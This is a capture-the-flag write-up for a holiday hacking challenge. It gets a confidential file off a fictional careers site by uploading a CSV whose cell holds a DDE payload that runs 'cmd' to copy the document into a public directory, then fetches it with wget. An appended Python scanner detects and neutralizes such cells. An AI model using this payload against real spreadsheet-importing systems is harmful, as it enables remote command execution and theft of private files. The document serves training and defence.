Objective 7: HR Incident Response

Difficulty: 4/5

Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website (https://careers.kringlecastle.com/) and fetch the document C:\candidate_evaluation.docx.
Which terrorist organization is secretly supported by the job applicant whose name begins with "K."?

For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.
Note: Sparkle Redberry can be found on Floor 1, lobby area (Area 3), left

Hints given:
Somehow Brian Hostetler is giving a talk on CSV injection WHILE he's giving a talk on Trufflehog. Whatta' guy! (https://www.youtube.com/watch?v=Z3qpcKVv2Bg)
https://www.owasp.org/index.php/CSV_Injection


The objective can be accessed directly via this link:
https://careers.kringlecastle.com/


When an empty test.csv file is uploaded to the website, the response discloses the location of the target document to the visitor:

C:\candidate_evaluation.docx

When navigating to a non-existent page (e.g. https://careers.kringlecastle.com/test), the website discloses the filesystem path of its publicly served directory and the corresponding URL:

404 Error!
Publicly accessible file served from: 
C:\careerportal\resources\public\ not found......
Try: 
https://careers.kringlecastle.com/public/'file name you are looking for'

Using those two pieces of information, it is possible to craft a malicious CSV file that copies the document into the publicly served directory:

=cmd|' /C copy C:\candidate_evaluation.docx C:\careerportal\resources\public\frog.doc'!A1

The copied file can then be downloaded from the webserver:

wget https://careers.kringlecastle.com/public/frog.doc
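A defensive counterpart to the upload above, added here as an example that is not part of the original writeup: a small Python scanner that flags formula-triggering cells in an uploaded CSV (including the DDE launch form used in this payload) and neutralizes them with a leading single quote, following the OWASP CSV Injection page linked in the hints. The sample CSV rows and all function names are constructed for this example; signed numbers such as "-3" are the edge case it must leave untouched.

```python
import csv
import io
import re

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# (per the OWASP CSV Injection page linked in the hints).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# DDE launch form used by the payload above: trigger, program, "|", args, "!cell".
DDE_PATTERN = re.compile(r"^\s*[=+\-@].*\|.*!")
# Signed numbers start with "+"/"-" but are data, not formulas.
NUMBER = re.compile(r"^[+-]?\d+(\.\d+)?$")

# Constructed sample upload (not the real site's data): row 1 carries the DDE
# payload from this writeup, row 2 an ordinary formula, and two signed numbers
# that must survive sanitization unchanged.
SAMPLE_CSV = (
    "name,years,note\n"
    "Applicant K,-3,=cmd|' /C copy C:\\candidate_evaluation.docx "
    "C:\\careerportal\\resources\\public\\frog.doc'!A1\n"
    "Applicant A,5,=SUM(A1:A2)\n"
    "Applicant B,+2,regular text\n"
)

def classify_cell(value):
    """'dde' for a DDE launch, 'formula' for any other formula-triggering cell,
    None for harmless text (signed numbers included)."""
    if not value or not value.startswith(FORMULA_TRIGGERS) or NUMBER.match(value):
        return None
    return "dde" if DDE_PATTERN.match(value) else "formula"

def neutralize_cell(value):
    """Prefix a dangerous cell with a single quote so spreadsheets show it as text."""
    return "'" + value if classify_cell(value) else value

def scan_and_sanitize(csv_text):
    """Return (findings, sanitized_csv); each finding is (row, col, kind, raw_value)."""
    findings = []
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            kind = classify_cell(cell)
            if kind:
                findings.append((r, c, kind, cell))
        writer.writerow([neutralize_cell(cell) for cell in row])
    return findings, out.getvalue()

if __name__ == "__main__":
    print(scan_and_sanitize(SAMPLE_CSV))
```

Run server-side on every upload before the CSV is stored or opened: the findings list is what to log or alert on, and the sanitized text is what to keep.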

The file mentions that Krampus was linked to the terrorist organization:
Fancy Beaver